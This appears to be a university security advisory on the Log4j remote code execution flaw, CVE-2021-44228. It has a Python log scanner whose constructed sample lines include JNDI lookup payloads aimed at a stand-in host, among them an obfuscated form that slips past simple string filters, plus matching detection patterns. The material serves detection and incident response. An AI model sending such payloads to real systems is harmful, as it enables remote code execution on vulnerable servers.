On December 9, 2021, a critical remote code execution vulnerability was publicly disclosed affecting multiple versions of the open-source Apache Log4j logging framework. This vulnerability has been assigned CVE-2021-44228.
Log4j is widely used in many applications and may be present as an embedded dependency in many commercial or open-source products. These may include commercial applications, locally developed applications, and cloud services. IT Pros can identify whether their systems are affected by examining the log files of any service that uses Log4j. Logs that record client-controlled strings, such as the user-agent header, URL strings, or form field submissions, are potentially vulnerable. The presence of 'jndi' strings in log events may indicate attempts at exploitation.
Examples include: 'jndi:ldap:/', 'jndi:rmi:/', 'jndi:ldaps:/', or 'jndi:dns:/'.
Note that this is not an exhaustive list.
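The following Python script is an added example of the log review described above; it is not part of this advisory and not a UISO or CISA tool. It scans a set of log lines for the 'jndi:' scheme strings listed here and reports the line number and scheme of each hit. It goes one step beyond the literal strings above: because Log4j resolves nested lookups such as ${lower:j} or ${::-j} before evaluating a message, an attempt can hide the word 'jndi' behind them, so the scanner first folds those common lookup forms and only then searches. The sample log lines, host names, and IP addresses are constructed for the example.

```python
import re
import sys

# Constructed sample lines (not real traffic) in a web-server access-log
# shape; line 2 carries a plain attempt in the user-agent field, line 3 a
# lightly obfuscated attempt in the URL.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://host.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:12 +0000] "GET /login?user=${${lower:j}ndi:rmi://host.example/b} HTTP/1.1" 400 0',
    '10.0.0.7 - - [10/Dec/2021:03:15:01 +0000] "POST /form HTTP/1.1" 200 128 "-" "curl/7.79"',
]

# Schemes named in the advisory; extend the tuple if your environment logs others.
SCHEMES = ("ldap", "ldaps", "rmi", "dns")

# An innermost ${...} lookup: one that contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"jndi:(%s):/" % "|".join(SCHEMES), re.IGNORECASE)


def normalize(text: str) -> str:
    """Fold common obfuscation lookups, innermost first, until nothing changes.

    ${lower:X} / ${upper:X} become X, and any lookup with a ':-' default
    (for example ${::-j} or ${env:NOPE:-j}) becomes its default value.
    A ${jndi:...} lookup itself is left untouched so the pattern match
    below can see it.
    """
    while True:
        changed = False

        def _resolve(m: re.Match) -> str:
            nonlocal changed
            body = m.group(1)
            key, sep, rest = body.partition(":")
            if sep and key.lower() in ("lower", "upper"):
                changed = True
                return rest.lower()
            if ":-" in body:
                changed = True
                return body.rsplit(":-", 1)[1]
            return m.group(0)

        text = _INNER.sub(_resolve, text)
        if not changed:
            return text


def scan_line(line: str):
    """Return the matched scheme (lower-case) if the line looks like an attempt, else None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan_logs(lines):
    """Return [(line_number, scheme, original_line)] for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        scheme = scan_line(line.rstrip("\n"))
        if scheme:
            hits.append((number, scheme, line.rstrip("\n")))
    return hits


if __name__ == "__main__":
    # Usage: python scan_jndi.py access.log   (falls back to the sample lines)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            hits = scan_logs(fh)
    else:
        hits = scan_logs(SAMPLE_LOGS)
    for number, scheme, line in hits:
        print(f"line {number}: jndi:{scheme} lookup -> {line}")
```

A hit means the string reached a log, not that the host was compromised; treat it as the trigger for the incident response steps below and preserve the original log file before anything else.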
Upon identification of exploitation attempts, immediately initiate incident response procedures and notify the University Information Security Office (UISO) via firstname.lastname@example.org.
The vulnerability impacts Apache Log4j versions 2.0 to 2.15; 1.x versions are no longer supported and may also be vulnerable. Any service or application that uses the Log4j framework to write log data to disk may be at risk and should be evaluated.
For a comprehensive list please see: https://github.com/cisagov/log4j-affected-db
The UISO has observed local exploitation of this vulnerability. CISA has observed numerous threat actors engaged in widespread Internet-based exploitation of this vulnerability.
Admins must patch to log4j-2.16.0 or newer. For commercial products, install vendor-supplied updates; if no updates are available, contact vendor support as soon as possible and restrict access to the affected systems via host-based or data center firewalls until patches can be applied. Mitigations for versions earlier than 2.15 are not effective.